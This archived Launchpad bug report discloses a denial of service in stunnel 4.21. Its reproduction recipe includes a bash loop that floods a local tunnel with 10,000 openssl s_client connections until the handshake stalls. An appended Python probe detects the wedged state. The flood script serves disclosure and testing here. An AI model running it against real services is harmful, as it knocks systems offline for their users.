[Bug 327222] [NEW] Simple stunnel DOS when opening and closing connections
Roman Fiedler
roman.fiedler at arcsmed.at
Mon Feb 9 15:36:55 UTC 2009
Public bug reported:
Binary package hint: stunnel4
Usually the stunnel4 main process (the one with the lowest IP) consumes 100%
of CPU; TCP connections are still accepted, but the SSL handshake is never started.
The test scenario below will make 10000 tests, but usually the test can
be suspended after 500-1000 tests; stunnel is broken by then.
stunnel4 on hardy x86:
Description: Ubuntu 8.04.2
Release: 8.04
# apt-cache policy stunnel4
stunnel4:
Installed: 3:4.21-1
Candidate: 3:4.21-1
Version table:
*** 3:4.21-1 0
500 http://security.ubuntu.com hardy/universe Packages
100 /var/lib/dpkg/status
# stunnel4 -version
stunnel 4.21 on i486-pc-linux-gnu with OpenSSL 0.9.8g 19 Oct 2007
Threading:PTHREAD SSL:ENGINE Sockets:POLL,IPv6 Auth:LIBWRAP
Global options
debug = 5
pid = /var/run/stunnel4.pid
RNDbytes = 64
RNDfile = /dev/urandom
RNDoverwrite = yes
Service-level options
cert = /etc/stunnel/stunnel.pem
ciphers = AES:ALL:!aNULL:!eNULL:+RC4:@STRENGTH
key = /etc/stunnel/stunnel.pem
session = 300 seconds
sslVersion = SSLv3 for client, all for server
TIMEOUTbusy = 300 seconds
TIMEOUTclose = 60 seconds
TIMEOUTconnect = 10 seconds
TIMEOUTidle = 43200 seconds
verify = none
Test Scenario:
* Generate keys:
openssl req -new -newkey rsa:1024 -nodes -keyout server.key -days 3653 -x509 -out server.cert -subj "/CN=server"
openssl req -new -newkey rsa:1024 -nodes -keyout client.key -days 3653 -x509 -out client.cert -subj "/CN=client"
* Create config:
service = test tunnel
foreground = yes
# Debug warnings only
debug = 4
pid = /home/[username]/tmp/tunnel/tunnel.pid
cert = server.cert
key = server.key
verify = 3
[testany]
accept = 1234
exec = /home/[username]/tmp/tunnel/testcmd.sh
execargs = testcmd.sh
CAfile = client.cert
* Create testcmd.sh script (it just appends whatever comes through the tunnel to a dump file):
#!/bin/bash
cat >> /tmp/dump
* Start tunnel in one shell
stunnel4 tunnel.cfg
* Start testscript in other:
#!/bin/bash
# Open 10000 TLS connections as fast as possible, each s_client in the
# background with no input; the tunnel usually wedges after 500-1000 of them.
procCount=0
while [ "${procCount}" != "10000" ] ; do
  openssl s_client -key client.key -cert client.cert -connect localhost:1234 < /dev/null > /dev/null 2>&1 &
  procCount=$((procCount+1))
  # Progress report every 100 connections
  if [ $((procCount % 100)) -eq 0 ] ; then
    echo "Test: ${procCount}"
  fi
done
# Clean up any s_client processes still waiting on a handshake
pkill -KILL -f "openssl s_client"
* When dead:
openssl s_client -key client.key -cert client.cert -connect localhost:1234
CONNECTED(00000003)
but no handshake follows.
** Affects: stunnel4 (Ubuntu)
Importance: Undecided
Status: New
--
Simple stunnel DOS when opening and closing connections
https://bugs.launchpad.net/bugs/327222
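The symptom described in the report (TCP accept succeeds, TLS handshake never starts) is easy to miss with a plain port check, since the port still answers. The following Python health probe is an added example, not part of the bug report or of stunnel itself: it distinguishes "refused", "TCP only" and "TLS ok" by attempting a handshake with a timeout, and it includes a constructed silent listener that imitates the wedged tunnel so the probe can be exercised offline. The host/port values and the one-second timeout are assumptions; the `classify_endpoint` and `start_silent_server` names are mine.

```python
import socket
import ssl
import threading


def classify_endpoint(host, port, timeout=3.0):
    """Probe host:port and report one of three states:
    'refused'  - no TCP connection at all (service down, firewalled, unreachable)
    'tcp-only' - TCP accepted but no TLS handshake within `timeout`
                 (the wedged-stunnel symptom from the report)
    'tls-ok'   - handshake completed
    """
    try:
        raw = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "refused"
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # Liveness probe only: certificate validation is deliberately off because
    # the question is "does the server speak TLS at all", not "is it trusted".
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    tls = ctx.wrap_socket(raw, server_hostname=host, do_handshake_on_connect=False)
    tls.settimeout(timeout)
    try:
        tls.do_handshake()
        return "tls-ok"
    except OSError:  # socket.timeout and ssl.SSLError both derive from OSError
        return "tcp-only"
    finally:
        tls.close()


def start_silent_server():
    """Constructed stand-in for the wedged tunnel (assumption, not stunnel):
    accepts TCP connections and never sends a byte.
    Returns (port, stop_event); set the event to shut the listener down."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port
    srv.listen(16)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def run():
        held = []
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                held.append(conn)  # keep it open, say nothing
            except socket.timeout:
                continue
        for conn in held:
            conn.close()
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port, stop


def demo_stuck_endpoint():
    """Probe the silent listener: the expected classification is 'tcp-only'."""
    port, stop = start_silent_server()
    try:
        return classify_endpoint("127.0.0.1", port, timeout=1.0)
    finally:
        stop.set()


def demo_closed_port():
    """Probe a port nothing listens on: the expected classification is 'refused'."""
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()  # port is free again (tiny race window, acceptable for a demo)
    return classify_endpoint("127.0.0.1", port, timeout=1.0)


if __name__ == "__main__":
    # Against the tunnel from the report, assumed to be listening on localhost:1234
    print("stunnel on localhost:1234:", classify_endpoint("localhost", 1234))
    print("silent listener:", demo_stuck_endpoint())
    print("closed port:", demo_closed_port())
```

Run it periodically (cron, or a monitoring agent's script check) and alert on "tcp-only": that state, combined with the 100% CPU the report mentions, is the signature of the wedged process, and a port-open check alone would report the service as healthy.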